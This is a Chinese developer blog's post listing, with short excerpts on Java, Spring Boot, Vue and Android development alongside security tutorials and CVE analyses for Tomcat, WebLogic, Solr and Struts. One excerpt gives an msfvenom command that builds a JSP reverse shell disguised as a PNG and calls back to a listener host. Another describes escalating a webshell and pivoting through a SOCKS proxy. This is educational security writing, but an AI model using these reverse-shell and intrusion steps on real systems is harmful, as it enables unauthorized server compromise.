自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

SouthWind0的博客

命运给予我们的不是失望之酒,而是机会之杯。

  • 博客(190)
  • 收藏
  • 关注

原创 love-system SSM爱心捐赠管理系统

love-system SSM爱心捐赠管理系统本系统为个人当初所写,现免费上传供下载,整体使用了SSM架构,Shiro来控制权限。后期如果有时间,打算使用Spring Boot和Vue重构,毕竟前后端分离已经是大势所趋。源码地址:https://gitee.com/southwind0/love-system1.技术选型- IDEA - JDK8- MySQL- Shiro- Spring- Spring MVC- MyBatis- Bootstrap- jQuery

2021-01-02 16:21:14 2510 2

原创 二. Android安全测试:使用drozer检测四大组件

二. Android安全测试:使用drozer检测四大组件在drozer console中直接使用help查看;然后进一步使用help command可查看各命令更具体的使用方法。通过输入安装包的部分关键字查找包全称 run app.package.list -f 安装包部分关键字run app.package.list -f demo使用app.package.info模块查看apk基本信息run app.package.info -a com.example.demo

2020-10-05 19:46:40 718 2

原创 Apache Tomcat任意文件读取漏洞和命令执行漏洞源码分析(CVE-2020-1938)

CVE-2020-1938(Tomcat源码漏洞分析)环境准备在分析Tomcat源码漏洞之前,我们先需要使用Idea配置Tomcat源码,请参考:https://blog.csdn.net/SouthWind0/article/details/105147406漏洞分析Tomcat在默认的conf/server.xml中配置了2个Connector,一个默认监听8080端口处理HT...

2020-03-27 18:31:29 1009 1

原创 Java的commons-collections反序列化漏洞

Java的commons-collections反序列化漏洞开始正文之前,我们的口号是:代码很有趣,安全很重要。1.漏洞描述在Java开发中,我们经常会使用到commons-collections这个jar包,当它的版本小于或等于3.2.1时,存在反序列化和远程代码执行的漏洞。2.漏洞详情TransformedMap这个类的decorate函数可以将一个普通的Map转换为一个T...

2019-04-29 21:51:44 1212

原创 通过SOCKS代理渗透整个内网

通过SOCKS代理渗透整个内网1.背景经过前期的渗透工作,我们现在已经成功找到了web站点的漏洞,并且获得了一个普通的webshell,现在准备用菜刀去连接它。注意:本次环境在本地搭建,假设现在一无所知,这样更加真实。2.对web服务器提权2.1获取漏洞信息获取到webshell后使用菜刀连接,查看权限是apache,系统是redhat6.5。上传linux.sh到...

2018-10-17 15:56:37 7538 1

原创 android去掉头部label报错的原因

1.android去掉头部label的方法网上很多关于android去掉头部label的方法,去掉之后,会发现报错。在AcdroidMainfest.xml添加如下:android:theme="@android:style/Theme.NoTitleBar"但是在安装APP后,直接闪退,这是为什么?2.闪退的原因这是因为AppCompatActivity默认带标题,而 Activity不带。我们直接去掉标题,会和AppCompatActivity冲突。所以我们只需要将继承Ap

2021-02-25 14:05:28 43

原创 大坑:url中+丢失的问题

1.url加号丢失问题今天在springboot项目,从前端url传入了Base64编码的字符串数据,结果发现后端报错。。。查了半天,最后发现url中+被替换成空格了!!!2.解决办法既然+号丢失,那使用url编码就好了,url编码后再发送,正常执行。...

2021-01-17 17:54:51 84

原创 redis未授权访问漏洞修复方案

1.redis未授权访问漏洞通过redis未授权访问漏洞,会造成敏感信息泄露,甚至被利用直接控制服务器,其危害不言而喻。但是在实际工作中,发现一些开发人员和运维人员并不知道如何妥善配置。因此有了本文,对redis的配置,建议就是2条,一个就是改强密码,一个就是改端口。2.redis改密码和端口给redis设置密码,密码应该由字母、数字、特殊符号组成。像123456,qwer1234这种弱口令肯定不合适,而Q1w@e3r4这种也不合适,因为它太随机、用的人太多,一般密码字典都会收录。所以密码的设置

2021-01-16 18:22:44 823

原创 idea常见快捷键大全

idea常见快捷键大全Ctrl+Z:撤销Ctrl+X:剪贴Ctrl+C:复制Ctrl+V:粘贴Ctrl+F:在当前文件中查找Ctrl+R:替换字符串Ctrl+Shift+F:在全局文件中查找字符串Ctrl+Shift+R:在全局中替换字符串Ctrl+Shift+N:查找文件Alt+Insert:产生构造方法,get/set方法等Alt+/:自动完成Alt+Enter:自动提示完成,抛出异常Ctrl+/:使用//注释Ctrl+Shift+/:使用/**/注释Ctrl+Alt+T

2020-12-16 17:10:17 40

原创 三. Android安全测试:为挂钩而战-Xposed模块编写

三. Android安全测试:为挂钩而战-Xposed模块编写1.Xposed框架Xposed是Android平台上的一个常用的HOOK框架,可以在不改变程序源代码的前提下,影响程序的运行。一个支持Xposed的Android应用程序被称为一个Xposed模块,用户可以在Xposed中安装各种各样的Xposed模块,在启用或关闭Xposed模块之后,需要重新引导系统才能生效。2.Xposed安装因为Xposed运行在root环境的,在手机使用需要刷机,一般测试在模拟器安装即可。在模拟器上安装

2020-11-01 22:47:22 102

原创 使用阿里云加速器解决docker下载镜像太慢的问题

使用阿里云加速器解决docker下载镜像太慢的问题1.网上流行的方案使用以下国内的源来加速,可是依然无效在/etc/docker/daemon.json文件中添加下面参数{ "registry-mirrors": [ "https://registry.docker-cn.com", "http://hub-mirror.c.163.com", "https://docker.mirrors.ustc.edu.cn" ]}2.使用阿里云加速器,飞一般的感...

2020-10-09 10:12:44 148

原创 一.移动安全之so文件调试:使用Android Studio生成so文件并调用

一.移动安全之so文件调试:使用Android Studio生成so文件并调用1.新建Android Studio项目,并新建JniTest类JniTest.javapackage com.sy.sohelloworld;public class JniTest { static { System.loadLibrary("JniTest"); } public native static String getString();}之后ma

2020-10-05 23:39:19 170

原创 一. Android安全测试:drozer的下载与安装

一. Android安全测试:drozer的下载与安装drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。1.下载安装依赖python2.7:drozer使用python2.7编写不支持python3.x。python其他库:pip install protobuf pyOpenSSL Twisted service_identityjdk1.8adb:一般在Android SDK安装目录下,或者模拟器安装目录下。2.电

2020-10-05 19:38:22 263

原创 2020年kali最新国内更新源/etc/apt/sources.list

切换到root用户(可参考Kali2020修改root用户密码),修改/etc/apt/sources.list:2020最新可用的源:#中科大deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contribdeb-src http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib#阿里云deb http://mirrors.aliy..

2020-09-04 15:37:04 1167

原创 mysql数据库远程访问权限控制

1.查看用户权限信息使用root用户登录本地mysql数据库,查看当前数据库所有用户远程访问信息。use mysql;select host,user from user; 2.host字段取值host字段表示用户登录范围,其取值:localhost表示本地登录;如果是某个IP,表示只能在该IP的主机上登录;如果“%”,则表示可在任意电脑上登录。如下所示:设置root用户的host字段值为"%",那么任意电脑都可以登录,这是非常危险的。...

2020-09-04 14:06:19 81

原创 Kali2020修改root用户密码

Kali2020开始,我们不能直接使用root用户登录操作了,但是很多操作需要root权限,我们就需要切换。执行以下命令修改root用户密码:sudo passwd rootsu root

2020-09-04 11:04:46 331

原创 Spring Boot容器配置,使用内置Tomcat并添加HTTPS

Spring Boot容器配置,Tomcat与HTTPS1.Tomcatspring boot项目可以内置Tomcat,Jetty等容器。2.HTTPS使用java的工具keytool生成一个数字证书,命令如下:keytool -genkey -alias southwind0 -keyalg RSA -keysize 2048 -keystore sw.pl2 -validity 1000这就生成了一个别名是southwind0、使用RSA算法加密、密钥长度2048、密钥存放位

2020-07-13 23:44:43 245 1

原创 AndroidStudio上传代码到gitee

AndroidStudio上传代码到gitee1.注册gitee既然要使用gitee,那就要先注册gitee的账号,链接如下:https://gitee.com/2.下载git并配置http://npm.taobao.org/mirrors/git-for-windows/v2.27.0.windows.1/按照默认提示按照即可,如下表示安装成功。打开git-cmd.exe,Git 全局设置如下:git config --global user.name "用户名"

2020-07-05 15:57:52 3801

原创 IDEA配置Tomcat源码

IDEA配置Tomcat源码1.下载tomcat源码压缩包https://archive.apache.org/dist/tomcat/tomcat-8/v8.5.47/src/apache-tomcat-8.5.47-src.zip2.构造目录新建一个文件夹tomcat8,将解压后的源码包复制进来,并在tomcat8目录下新建home目录,将源码包下的webapps和conf目录...

2020-03-27 18:20:23 319

原创 CVE-2020-1938(RCE利用)

CVE-2020-1938(RCE利用)1.使用msf生成反弹shell马,并且监听msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R > shell.png假设利用上传点,把此图片上传到了目标服务器/log/shell.png。在msf监听:msf > use expl...

2020-03-27 18:17:23 11763 1

原创 Apache Tomcat任意文件读取漏洞POC测试(CVE-2020-1938)

CVE-2020-1938(POC测试)1.背景Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun Microsystems提供的技术规范,实现了对Servlet和JavaServer Page(JSP)的支持。Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互。由于Tomcat本身也内含了HTTP服...

2020-03-27 18:15:31 2661

原创 Tomcat的DefaultServlet和JspServlet

Tomcat的DefaultServlet和JspServletTomcat在/conf/web.xml中默认定义了两个Servlet,DefaultServlet和JspServlet。该web.xml对于所有tomcat加载的的web application都会应用,会和application本身的web.xml进行合并。1.DefaultServletDefaultServlet...

2020-03-27 18:12:18 165

原创 透明模式与路由模式

透明模式与路由模式1. 透明模式透明模式:对用户是透明的,即用户意识不到防火墙的存在。接口无法配置IP地址,唯一IP地址配置在Management 接口,用于设备的管理。用于2层网络的安全隔离。控制同一局域网内部安全访问。流量转发:与交换机类似,接口无IP地址,通过目的MAC地址转发数据包。优缺点:不需要重新做IP地址规划。2. 路由模式路由模式:每个接口都配置IP地址...

2020-03-14 19:03:56 2283

原创 Vue.js中的XSS攻击

Vue.js中的XSS攻击Vue.js中数据绑定最常见的形式就是使用“Mustache”语法 (双大括号) 的文本插值:{{ message }},但是双大括号会将数据解释为普通文本,而非 HTML 代码,有的时候需要输出真正的 HTML,就需要使用 v-html 指令。如下代码:可以看到,使用v-html时恶意代码被执行,而使用{{}}时不会执行。在站点上动态渲染HTML...

2019-12-16 17:41:16 4586

原创 Vue核心基本功能

Vue核心基本功能1.Vue.js安装(1)命令行工具 (CLI)Vue提供了一个官方的CLI,为单页面应用(SPA)快速搭建繁杂的脚手架。参考上一篇文章:https://blog.csdn.net/SouthWind0/article/details/100775151(2)几种引入方式CDN <script src="https://cdn.jsdelivr...

2019-12-16 17:15:29 216

原创 Spring Boot启动方式与定制Banner

Spring Boot启动方式与定制Banner1.Spring Boot启动方式(1)使用Maven命令启动mvn spring-boot:run(2)直接运行main方法直接在IDEA运行App类的main方法。(3)打包运行SpringBoot应用还可以直接打成jar包运行,然后以java -jar命令执行。打包:mvn package运行:java -j...

2019-12-15 22:14:09 134

原创 Spring Boot之旅

Spring Boot之旅Spring Boot是由Pivotal团队提供的全新框架,其设计目的是用来简化新Spring应用的初始搭建以及开发过程。该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。通过这种方式,Spring Boot致力于在蓬勃发展的快速应用开发领域(rapid application development)成为领导者。为了深入学习Spring ...

2019-11-24 23:57:58 93

原创 使用IDEA创建Spring Boot的demo项目

使用IDEA创建Spring Boot的demo项目1. Spring Boot简介Spring Boot是由Pivotal团队提供的全新框架,其设计目的是用来简化新Spring应用的初始搭建以及开发过程。该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。通过这种方式,Spring Boot致力于在蓬勃发展的快速应用开发领域(rapid application de...

2019-11-24 22:09:12 234

原创 Apache Solr 远程命令执行漏洞(CVE-2019-0193)

Apache Solr 远程命令执行漏洞(CVE-2019-0193)声明:本篇文章仅限用于学习信息安全技术,请勿用于非法途径!1.漏洞描述2019年8月1日,Apache Solr官方发布了CVE-2019-0193漏洞预警,漏洞危害评级为严重。当solr开启了DataImportHandler功能,该模块中的DIH配置都可以通过外部请求dataconfig参数进行修改,DIH可包含...

2019-11-24 21:28:55 561

原创 WebLogic 反序列化漏洞(CVE-2019-2890)

WebLogic 反序列化漏洞(CVE-2019-2890)漏洞描述2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞,漏洞编号为CVE-2019-2890。Weblogic在利用T3协议进行远程资源加载调用时,默认会进行黑名单过滤以保证反序列化安全。本漏洞绕过了Weblogic的反序列化黑名单,使攻击者可以...

2019-10-20 21:47:18 1488 3

原创 AngularJS创建demo项目

AngularJS创建demo项目AngularJS诞生于2009年,由Misko Hevery 等人创建,后为Google所收购。是一款优秀的前端JS框架,已经被用于Google的多款产品当中。1.安装node.js首先下载安装node.js,如果已安装可以跳过,下载地址:https://nodejs.org/en/需要注意:按照提示一步步安装即可,其中可以选择安装目录,我这...

2019-10-17 21:55:57 438

原创 Vue新建一个demo项目

Vue新建一个demo项目Vue是一套用于构建用户界面的渐进式JavaScript框架。与其它大型框架不同的是,Vue 被设计为可以自底向上逐层应用。Vue 的核心库只关注视图层,方便与第三方库或既有项目整合。1.安装node.js首先下载安装node.js,如果已安装可以跳过,下载地址:https://nodejs.org/en/需要注意:按照提示一步步安装即可,其中可以选择...

2019-09-12 16:04:41 501

原创 Android开发系列:4.利用 Android Studio开发看美女应用

4.利用 Android Studio开发看美女应用今天我们会利用 Android Studio开发一个简单的看美女应用,通过它查看互联网上的美女图片。通过本篇文章,你将会学到Android应用简单开发,Android权限申请,Android应用图标适配,Android应用签名打包等内容。 Android君最喜欢美人,尤其仙姿玉色,玉洁冰清,一顾倾人城,再顾倾人国那种绝代佳人,在文章的后面你会...

2019-09-09 18:03:46 372

原创 Android开发系列:3.利用Android Studio开发一个demo应用

3.利用Android Studio开发一个demo应用本文介绍利用Android Studio开发一个demo应用,自古美女爱英雄,Android君当年身经百战,所向披靡,以Android君的经历表明,再小的战争,也要全力以赴。3.1创建第一个demo应用(1)Create New Project(2)Configure your project点击Finish看...

2019-09-09 17:52:04 543

原创 Android开发系列:2.使用Android Studio搭建Android开发环境

2.Android开发环境搭建本文基于win10,记录Android Studio开发环境搭建。想当年桃花谢了春红,青山负了绿水,眼看他起朱楼,眼看他宴宾客,眼看他楼塌了。唯有Android君细水长流,恩爱如初,他的做法是----给她一个窝,使她以生存。2.1下载jdk和Android Studio(1)下载jdkhttp://www.oracle.com/technetwork/...

2019-09-09 16:24:54 98

原创 Android开发系列:1.安卓操作系统架构与应用程序组件

1.安卓操作系统架构与应用程序组件本文介绍安卓操作系统架构和应用程序基本组件,以Android君的亲身经历告诉你,爱她就要了解她。1.1安卓操作系统架构Android是一种基于Linux的自由及开放源代码的操作系统。而Android系统构架是安卓系统的体系结构,其系统架构和其操作系统一样,采用了分层的架构,共分为四层五部分,四层指的是从高到低分别是Android应用层,Android应...

2019-09-09 16:04:20 437

原创 JAVA之万物皆空

JAVA之万物皆空大乘佛教有一本典籍《般若波罗蜜多心经》,它说:“观自在菩萨,行深般若波罗蜜多时,照见五蕴皆空,度一切苦厄。舍利子,色不异空,空不异色,色即是空,空即是色,受想行识,亦复如是。舍利子,是诸法空相,不生不灭,不垢不净,不增不减……。“对应于JAVA世界中就是null了,机灵的你可能会想到null,isEmpty(),””三者又有什么区别?我们慢慢揭开它的神秘面纱。(1)n...

2019-08-11 23:49:21 148

原创 S2-001漏洞分析

S2-001漏洞分析1.漏洞描述该漏洞因用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。如注册或登录页面,提交失败后一般会默认返回之前提交的数据,由于后端使用%{value}对提交的数据执行了一次OGNL 表达式解析,所以可以直接构造 Payload进行命令执行。2.影响版本Struts 2.0...

2019-08-09 17:58:55 428

原创 Zookeeper注册中心与Dubbo-Admin管理平台搭建

Zookeeper注册中心与Dubbo-Admin管理平台搭建度娘的介绍:ZooKeeper是一个开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。ZooKeeper的目标就是封装好复杂易出错的关键服务,将简单易用的接口和性能高效...

2019-06-23 18:40:07 309

原创 JAVA集合之Map集合,Set集合,List集合

JAVA集合之Map集合,Set集合,List集合1.集合和数组的区别?1.数组的长度是固定的,集合的大小是可动态变化的。2.数组存储的元素可以是基本类型和引用类型,集合存储的元素只能是引用类型。2.集合集合类包括Set、List、Map集合,其中Set和List继承了Collection接口。Set不能包含重复的元素。List是一个有序的集合,可以包含重复的元素,提供了按索引...

2019-04-27 00:26:13 259

空空如也

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人 TA的粉丝

提示
确定要删除当前文章?
取消 删除